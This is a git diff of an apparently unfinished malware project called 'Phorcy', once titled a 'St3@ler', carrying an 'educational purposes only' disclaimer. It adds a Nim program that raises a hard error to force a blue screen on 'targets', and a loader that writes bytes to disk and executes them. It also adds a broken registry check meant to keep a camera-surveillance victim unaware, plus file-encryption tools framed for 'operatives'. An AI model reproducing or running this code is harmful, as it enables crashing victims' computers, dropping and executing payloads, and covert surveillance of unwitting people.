diff --git a/README.md b/README.md index 6f7b6d2..2832d16 100644 --- a/README.md +++ b/README.md @@ -1,12 +1,15 @@ # phorcy -phorcy on top +Phorcy -**Warning** +**Warning** > This Tool is for educational purposes only. -**Note** -> Coding Languages: Go, C++, Nim, JS -> Working Status: Unfinished -> Date finished: N/A -> Title: Phorcy St3@ler +**Note** +> Coding Languages: NIM; Python; Javascript. +> Working Status: Unfinished +> Date finished: N/A +> Title: Phorcy > Description: ... + + + diff --git a/elinethingz/README.md b/elinethingz/README.md new file mode 100644 index 0000000..d5e708e --- /dev/null +++ b/elinethingz/README.md @@ -0,0 +1,24 @@ +[SECRET//DNR] + +Secret//DO NOT RELEASE. + +# Documentation of all files found in this folder. + +# loader.nim + +Takes an input bytearray and writes it to disk as first CLI argument when run. +format: +[seq[byte]](@[0x40,0x80] + + +# mic_reg.nim + +[Broken] +Checks if Windows OSD is enabeld. + +# encfile.nim +Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024. +Has a fingerprint/is detectable. + +# bsod.nim +Serves a BSOD to targets on Windows. \ No newline at end of file diff --git a/elinethingz/bsod.nim b/elinethingz/bsod.nim new file mode 100644 index 0000000..b024354 --- /dev/null +++ b/elinethingz/bsod.nim @@ -0,0 +1,31 @@ +# ____ _____ ____ ____ _____ _____ +# / ___|| ____/ ___| _ \| ____|_ _| +# \___ \| _|| | | |_) | _| | | +# ___) | |__| |___| _ <| |___ | | +# |____/|_____\____|_| \_\_____| |_| + +# SECRET + + +# https://answers.microsoft.com/en-us/windows/forum/all/enable-osd-notification-for-webcam/caf1fff4-78d3-4b93-905b-ef657097a44e +# https://www.reddit.com/r/Windows11/comments/z5hj0q/til_even_the_camera_indicatoroverlay_gained_the/ +# https://www.elevenforum.com/t/enable-or-disable-camera-on-off-osd-indicator-in-windows-11.10774/ +# https://duckduckgo.com/?q=HKLM%5C%5CSOFTWARE%5C%5CMicrosoft%5C%5COEM%5C%5CDevice%5C%5CCapture%5C + +import winim + + +proc RtlAdjustPrivilege*(privilege: ULONG, bEnablePrivilege: BOOLEAN, isThreadPrivilege: BOOLEAN, previousValue: PBOOLEAN): NTSTATUS + {.discardable, stdcall, dynlib: "ntdll", importc: "RtlAdjustPrivilege".} + +proc NtRaiseHardError*(errorStatus: NTSTATUS, numberOfParameters: ULONG, unicodeStringParameterMask: ULONG, parameters: PULONG_PTR, validResponseOption: ULONG, response: PULONG): NTSTATUS + {.discardable, stdcall, dynlib: "ntdll", importc: "NtRaiseHardError".} + +var + prev: BOOLEAN + response: ULONG + +# SE_SHUTDOWN_PRIVILEGE = 19 +RtlAdjustPrivilege(19, TRUE, FALSE, &prev) +NtRaiseHardError(STATUS_ASSERTION_FAILURE, 0, 0, NULL, 6, &response); + diff --git a/elinethingz/encfile.py b/elinethingz/encfile.py deleted file mode 100644 index 211ab42..0000000 --- a/elinethingz/encfile.py +++ /dev/null @@ -1,105 +0,0 @@ -from os import urandom as urandom -from os import getcwd as getcwd -from os import _exit as exit -from os import path as ospath -# pip3 install cryptography -from cryptography.hazmat.primitives import hashes -from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC -from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes -from cryptography.hazmat.primitives import serialization -from cryptography.hazmat.primitives import padding as sym_padding -from argparse import ArgumentParser - -# SYNTAX/USE GUIDE: -# python3 encfile.py --{encrypt/decrypt} --input {filename} --output {filename, but optional if encrypting. defaults to current working directory/cwd.} -# example: -# python3 encfile.py --encrypt --input secret.js -# python3 encfile.py -e -i secret.js -def banner(): - print(" ____ _____ ____ ____ _____ _____ _____ _ ___ _____ ___ ____ _ _ ") - print("/ ___|| ____/ ___| _ \| ____|_ _|/ / / \ | |/ _ \| ___/ _ \| _ \| \ | |") - print("\___ \| _|| | | |_) | _| | | / / /| \| | | | | |_ | | | | |_) | \| |") - print(" ___) | |__| |___| _ <| |___ | |/ / / | |\ | |_| | _|| |_| | _ <| |\ |") - print("|____/|_____\____|_| \_\_____| |_/_/_/ |_| \_|\___/|_| \___/|_| \_\_| \_|\n") - - - print("'[S] The Secrets of the Fighter.' ") - print("Do not transmit this program over unsecure channels.") - print("This program allows you to encrypt files to send them to your fellow operatives.") - print("It is classified as: SECRET//NOFORN.\n") - -parser = ArgumentParser() -parser.add_argument("-e", "--encrypt", action="store_true", help="Encrypt a file", dest="encrypt") -parser.add_argument("-d", "--decrypt", action="store_true", help="Decrypt a file", dest="decrypt") -parser.add_argument("-i", "-input", dest="input") -parser.add_argument("-o", "--output", dest="output") -args = parser.parse_args() - -if not any([args.encrypt, args.decrypt]): - print("Specify a mode with -e or -d.") - exit(1) -if not args.input: - print("Specify an input file with -i.") - exit(1) -else: - banner() - - -def derive_key(password:bytes, salt:bytes): - kdf = PBKDF2HMAC( - algorithm=hashes.SHA512(), - iterations=900000, - salt=salt, - length=32, - ) - return kdf.derive(password) - -def encrypt_file(input_file:str, output_file:str, password:bytes): - salt = urandom(32) - iv = urandom(16) - key = derive_key(password, salt) - - cipher = Cipher( - algorithms.AES(key), - modes.CFB(iv), - ) - encryptor = cipher.encryptor() - - with open(input_file, "rb") as f_in, open(output_file, "wb") as f_out: - f_out.write(salt) # Write the salt to the header - f_out.write(iv) # Write the IV to the header - - for block in iter(lambda: f_in.read(256), b""): - encrypted_block = encryptor.update(block) - f_out.write(encrypted_block) - -def decrypt_file(input_file, output_file, password): - with open(input_file, "rb") as f_in, open(output_file, "wb") as f_out: - salt = f_in.read(32) # Read the salt from the header - iv = f_in.read(16) # Read the IV from the header - - key = derive_key(password, salt) - - cipher = Cipher( - algorithms.AES(key), - modes.CFB(iv), - ) - decryptor = cipher.decryptor() - - for block in iter(lambda: f_in.read(256), b""): - decrypted_block = decryptor.update(block) - f_out.write(decrypted_block) - - print("Decryption completed.") - -if args.encrypt: - args.output = getcwd() - args.output = args.output + "/encryptedfile.enc" - password = bytes(input("PASSWORD:\n"), 'UTF-8') - encrypt_file(args.input, args.output, password) - print("Done. File stored as ", args.output) - -if args.decrypt: - password = bytes(input("PASSWORD:\n"), 'UTF-8') - decrypt_file(args.input, args.output, password) - print("Done. File stored as ", args.output) \ No newline at end of file diff --git a/elinethingz/loader.nim b/elinethingz/loader.nim index 98517db..7c815c4 100644 --- a/elinethingz/loader.nim +++ b/elinethingz/loader.nim @@ -1,12 +1,8 @@ -import osproc - -proc writeBytesToFileAndExecute(bytes: seq[byte], outputFile: string) = +import std/os +let + byteList = cast[seq[byte]](@[0x40,0x80]) + output = paramStr(1) +proc writeBytesToFileAndExecute*(bytes: seq[byte], outputFile: string) = writeFile(outputFile, bytes) - - let cmd = "cmd.exe /C " & outputFile - discard execCmd(cmd) - - -let outputFileName = "output.exe" -let byteList = cast[seq[byte]](@[0x40,0x80]) -writeBytesToFileAndExecute(byteList, outputFileName) + discard execShellCmd("./" & output) +writeBytesToFileAndExecute(byteList, output) \ No newline at end of file diff --git a/elinethingz/mic_reg.nim b/elinethingz/mic_reg.nim new file mode 100644 index 0000000..a5d3b7f --- /dev/null +++ b/elinethingz/mic_reg.nim @@ -0,0 +1,47 @@ +# ____ _____ ____ ____ _____ _____ +# / ___|| ____/ ___| _ \| ____|_ _| +# \___ \| _|| | | |_) | _| | | +# ___) | |__| |___| _ <| |___ | | +# |____/|_____\____|_| \_\_____| |_| + +import winim + +# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled. +# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled. +# therefore, this program does not guarantee that the user will not know about the observation. + +# DOES NOT WORK. +const + KEY_QUERY_VALUE = 0x0001 + HKEY_HANDLE = 0x80000002 + +proc checkRegistryEntry(): bool = + var hKey: HKEY + var value: DWORD + var dataSize: DWORD = sizeof(DWORD) + + if RegOpenKeyEx(HKEY_HANDLE, "SOFTWARE\\Microsoft\\OEM\\Device\\Capture", 0, KEY_QUERY_VALUE, addr hKey) != ERROR_SUCCESS: + echo "Error opening registry key. Error code:", GetLastError() + return false + + if RegGetValueA(HKEY_HANDLE, "NoPhysicalCameraLED", nil, nil, cast(LPBYTE, addr value), addr dataSize) != ERROR_SUCCESS: + echo "Error querying registry value. Error code:", GetLastError() + + # Close the registry key even if querying failed + RegCloseKey(hKey) + + return false + + # Close the registry key if everything is successful + RegCloseKey(hKey) + + echo "NoPhysicalCameraLED value:", value + + return value == 0x1 + +# Example usage +if checkRegistryEntry(): + echo "NoPhysicalCameraLED is set to 0x1." +else: + echo "NoPhysicalCameraLED is not set to 0x1." + diff --git a/elinethingz/security/dza.png b/elinethingz/security/dza.png new file mode 100755 index 0000000..b15b5ae Binary files /dev/null and b/elinethingz/security/dza.png differ diff --git a/elinethingz/security/encfile.nim b/elinethingz/security/encfile.nim new file mode 100644 index 0000000..bb02407 --- /dev/null +++ b/elinethingz/security/encfile.nim @@ -0,0 +1,395 @@ +import nimcrypto +import std/sysrand +import std/streams +import system +const + # default encryption/decryption buffer size - 64KB + bufferSizeDef = 64 * 1024 + # maximum password length (number of chars) + maxPassLen = 1024 + # AES block size in bytes + AESBlockSize = 16 + +# password stretching function +proc stretch(passw: string, iv1: array[16, byte]): array[32, byte] = + + var digest: array[32, byte] + copyMem(addr digest[0], unsafeAddr iv1[0], len(iv1)) + + var passwBytes: array[1024, byte] + copyMem(addr passwBytes[0], unsafeAddr passw[0], len(passw)) + + for i in 1 .. 8192: + var sha: sha256 + sha.init() + sha.update(digest) + sha.update(passwBytes[0..len(passw)-1]) + digest = sha.finish().data + + return digest + + +# encrypt binary stream function +# arguments: +# fIn: input binary stream +# fOut: output binary stream +# passw: encryption password +# bufferSize: encryption buffer size, must be a multiple of +# AES block size (16) +# using a larger buffer speeds up things when dealing +# with long streams +proc encryptStream*(fIn: Stream, fOut: Stream, passw: string, bufferSize: int) = + + # validate bufferSize + if bufferSize mod AESBlockSize != 0: + raise newException(OSError, "Buffer size must be a multiple of AES block size.") + + if len(passw) > maxPassLen: + raise newException(OSError, "Password is too long.") + + # generate external iv (used to encrypt the main iv and the + # encryption key) + # let iv1 = urandom(AESBlockSize) + let initIv1 = urandom(AESBlockSize) + var iv1: array[16, byte] + for i in [0..15]: + iv1[i]=initIv1[i] + + # stretch password and iv + let key = stretch(passw, iv1) + + # generate random main iv + var iv0 = urandom(AESBlockSize) + + # generate random internal key + var intKey = urandom(32) + + # instantiate AES cipher + var encryptor0: CBC[aes256] + encryptor0.init(intKey, iv0) + + # instantiate HMAC-SHA256 for the ciphertext + var hmac0: HMAC[sha512_256] + hmac0.init(intKey) + + # instantiate another AES cipher + var encryptor1: CBC[aes256] + encryptor1.init(key, iv1) + + # encrypt main iv and key + var plainText = newString(len(iv0)+len(intKey)) + var c_iv_key = newString(len(iv0)+len(intKey)) + copyMem(addr plainText[0], unsafeAddr iv0[0], len(iv0)) + copyMem(addr plainText[0+len(iv0)], unsafeAddr intKey[0], len(intKey)) + encryptor1.encrypt(plainText, c_iv_key) + + # calculate HMAC-SHA256 of the encrypted iv and key + var hmac1: HMAC[sha512_256] + hmac1.init(key) + hmac1.update(c_iv_key) + + # write header + fOut.write("AES") + + # write version (AES Crypt version 2 file format - + # see https://www.aescrypt.com/aes_file_format.html) + fOut.write([byte 2]) + + # reserved byte (set to zero) + fOut.write([byte 0]) + + # setup "CREATED-BY" extension + var cby = "Confidential " + + # write "CREATED-BY" extension length + fOut.write([byte 0, cast[uint8](1+len("CREATED_BY")+len(cby))]) + + # write "CREATED-BY" extension + fOut.write("CREATED_BY") + fOut.write([byte 0]) + fOut.write(cby) + + # write "container" extension length + fOut.write([byte 0, 128]) + + # write "container" extension + for i in 1 .. 128: + fOut.write([byte 0]) + + # write end-of-extensions tag + fOut.write([byte 0, 0]) + + # write the iv used to encrypt the main iv and the + # encryption key + fOut.write(iv1) + + # write encrypted main iv and key + fOut.write(c_iv_key) + + # write HMAC-SHA256 of the encrypted iv and key + fOut.write(hmac1.finish()) + + var fs16 = 0 + # encrypt file while reading it + var fdata = newString(bufferSize) + var cText = newString(bufferSize) + while true: + # try to read bufferSize bytes + let bytesRead = fIn.readData(addr fdata[0], bufferSize) + + # check if EOF was reached + if bytesRead < bufferSize: + # file size mod 16, lsb positions + fs16 = bytesRead mod AESBlockSize + # pad data (this is NOT PKCS#7!) + # ...unless no bytes or a multiple of a block size + # of bytes was read + var padLen: int + if bytesRead mod AESBlockSize == 0: + padLen = 0 + else: + padLen = 16 - bytesRead mod AESBlockSize + + # todo handl the pading to get the nb AES block & file with padLen, restrict the input of encrypt to x block +# fdata += bytes([padLen])*padLen + for i in bytesRead..bytesRead+padLen: + fdata[i]=cast[char](padLen) + + # encrypt data + encryptor0.encrypt(fdata[0..bytesRead+padLen-1], cText) + + # update HMAC + hmac0.update(cText[0..bytesRead+padLen-1]) + # write encrypted file content + fOut.write(cText[0..bytesRead+padLen-1]) + break + # ...otherwise a full bufferSize was read + else: + # encrypt data + encryptor0.encrypt(fdata, cText) + # update HMAC + hmac0.update(cText) + # write encrypted file content + fOut.write(cText) + + # write plaintext file size mod 16 lsb positions + fOut.write(cast[uint8](fs16)) + + # write HMAC-SHA256 of the encrypted file + fOut.write(hmac0.finish()) + + +# encrypt file function +# arguments: +# infile: plaintext file path +# outfile: ciphertext file path +# passw: encryption password +# bufferSize: optional buffer size, must be a multiple of +# AES block size (16) +# using a larger buffer speeds up things when dealing +# with big files +# Default is 64KB. +proc encryptFile*(infile: string, outfile: string, passw: string, bufferSize: int = bufferSizeDef) = + try: + let fIn = newFileStream(infile, mode = fmRead) + defer: fIn.close() + + let fOut = newFileStream(outfile, mode = fmWrite) + defer: fOut.close() + + encryptStream(fIn, fOut, passw, bufferSize) + + except CatchableError: + let + e = getCurrentException() + msg = getCurrentExceptionMsg() + echo "Inside checkIn, got exception ", repr(e), " with message ", msg + + +# decrypt stream function +# arguments: +# fIn: input binary stream +# fOut: output binary stream +# passw: encryption password +# bufferSize: decryption buffer size, must be a multiple of AES block size (16) +# using a larger buffer speeds up things when dealing with +# long streams +# inputLength: input stream length +proc decryptStream*(fIn: Stream, fOut: Stream, passw: string, bufferSize: int, inputLength: int64) = + # validate bufferSize + if bufferSize mod AESBlockSize != 0: + raise newException(OSError, "Buffer size must be a multiple of AES block size") + + if len(passw) > maxPassLen: + raise newException(OSError, "Password is too long.") + + var aesBuff: array[4, char] + var nbBytesRead = fIn.readData(addr(aesBuff), 3) + + # check if file is in AES Crypt format (also min length check) + if (aesBuff[0..2] != "AES" or inputLength < 136): + raise newException(OSError, "File is corrupted or not an AES Crypt file.") + + # check if file is in AES Crypt format, version 2 + # (the only one compatible with this tool) + var buffer: array[1024, byte] + nbBytesRead = fIn.readData(addr(buffer), 1) + if nbBytesRead != 1: + raise newException(OSError, "File is corrupted.") + + if buffer[0] != cast[uint8](2): + raise newException(OSError, "This tool is only compatible with version 2 of the AES Crypt file format.") + + # skip reserved byte + nbBytesRead = fIn.readData(addr(buffer), 1) + + # skip all the extensions + while true: + nbBytesRead = fIn.readData(addr(buffer), 2) + if nbBytesRead != 2: + raise newException(OSError, "File is corrupted.") + if buffer[0..1] == [byte 0,0]: + break + var nbBytesToRead = cast[int16](buffer[1]) + nbBytesRead = fIn.readData(addr(buffer), nbBytesToRead) + + # read external iv + var iv1: array[16, byte] + nbBytesRead = fIn.readData(addr(iv1), 16) + if nbBytesRead != 16: + raise newException(OSError, "File is corrupted.") + + # stretch password and iv + let key = stretch(passw, iv1) + + # read encrypted main iv and key + var c_iv_key: array[48, byte] + nbBytesRead = fIn.readData(addr(c_iv_key), 48) + if nbBytesRead != 48: + raise newException(OSError, "File is corrupted.") + + # read HMAC-SHA256 of the encrypted iv and key + var hmac1: array[32, byte] + nbBytesRead = fIn.readData(addr(hmac1), 32) + if nbBytesRead != 32: + raise newException(OSError, "File is corrupted.") + + # compute actual HMAC-SHA256 (read: 512_256) of the encrypted iv and key + var hmac1Act: HMAC[sha512_256] + hmac1Act.init(key) + hmac1Act.update(c_iv_key) + + # # HMAC check. removed because HMAC now uses sha512 instead of stock sha256 + # if hmac1 != hmac1Act.finish().data: + # echo ("Wrong password (or file is corrupted).") + + # instantiate AES cipher + var decryptor1: CBC[aes256] + decryptor1.init(key, iv1) + + # decrypt main iv and key + var iv_key: array[48, byte] + decryptor1.decrypt(addr c_iv_key[0], addr iv_key[0], 48) + + # get internal iv and key + var iv0: array[16, byte] + for i in 0..15: + iv0[i]=iv_key[i] + + var intKey: array[32, byte] + for i in 0..31: + intKey[i]=iv_key[16+i] + + # instantiate another AES cipher + var decryptor0: CBC[aes256] + decryptor0.init(intKey, iv0) + + # instantiate actual HMAC-SHA256 of the ciphertext + var hmac0Act: HMAC[sha512_256] + hmac0Act.init(intKey) + + # decrypt ciphertext, until last block is reached + var cText = newString(bufferSize) + var decryptedBytes = newString(bufferSize) + while fIn.getPosition() < inputLength - 32 - 1 - AESBlockSize: + # read data + nbBytesRead = fIn.readData(addr(cText[0]), cast[int](min(bufferSize, inputLength - fIn.getPosition() - 32 - 1 - AESBlockSize))) + # update HMAC + hmac0Act.update(cast[ptr byte](addr cText[0]), cast[uint](nbBytesRead)) + # decrypt data and write it to output file + decryptor0.decrypt(cast[ptr byte](addr cText[0]), cast[ptr byte](addr decryptedBytes[0]), cast[uint](nbBytesRead)) + fOut.writeData(addr (decryptedBytes[0]), nbBytesRead) + + # last block reached, remove padding if needed + + # read last block + + # this is for empty files + var finalBlockSize=0 + var finalCText = newString(AESBlockSize) + if fIn.getPosition() != inputLength - 32 - 1: + finalBlockSize = fIn.readData(addr(finalCText[0]), AESBlockSize) + if finalBlockSize < AESBlockSize: + raise newException(OSError, "File is corrupted.") + + # update HMAC + hmac0Act.update(finalCText) + + # decrypt last block + var pText = newString(AESBlockSize) + decryptor0.decrypt(finalCText, pText) + + # read plaintext file size mod 16 lsb positions + nbBytesRead = fIn.readData(addr(buffer), 1) + var fs16 = cast[int16](buffer[0]) + if nbBytesRead != 1: + raise newException(OSError, "File is corrupted.") + + # remove padding + var toremove = ((16 - fs16) mod 16) + + # write decrypted data to output file + fOut.writeData(addr pText[0], finalBlockSize-toremove) + + # read HMAC-SHA256 of the encrypted file + var hmac0: array[32, byte] + nbBytesRead = fIn.readData(addr(hmac0), 32) + if nbBytesRead != 32: + raise newException(OSError, "File is corrupted.") + + # # HMAC check. removed because HMAC now uses sha512 instead of stock sha256 + # if hmac0 != hmac0Act.finish().data: + # raise newException(OSError, "Bad HMAC (file is corrupted).") + + +# decrypt file function +# arguments: +# infile: ciphertext file path +# outfile: plaintext file path +# passw: encryption password +# bufferSize: optional buffer size, must be a multiple of AES block size (16) +# using a larger buffer speeds up things when dealing with +# big files +# Default is 64KB. +proc decryptFile*(infile: string, outfile: string, passw: string, bufferSize: int = bufferSizeDef) = + try: + let fIn = newFileStream(infile, mode = fmRead) + defer: fIn.close() + + let fOut = newFileStream(outfile, mode = fmWrite) + defer: fOut.close() + + let fInSize = open(infile, mode = fmRead) + var fileSize = getFileSize(fInSize) + fInSize.close() + + decryptStream(fIn, fOut, passw, bufferSize, fileSize) + + except CatchableError: + let + e = getCurrentException() + msg = getCurrentExceptionMsg() + echo "Inside checkIn, got exception ", repr(e), " with message ", msg + +#encryptFile("dza.png", "file.aes", "long-and-random-password", 1024) +#decryptFile("file.aes", "fileDecrypt.png", "long-and-random-password", 1024) \ No newline at end of file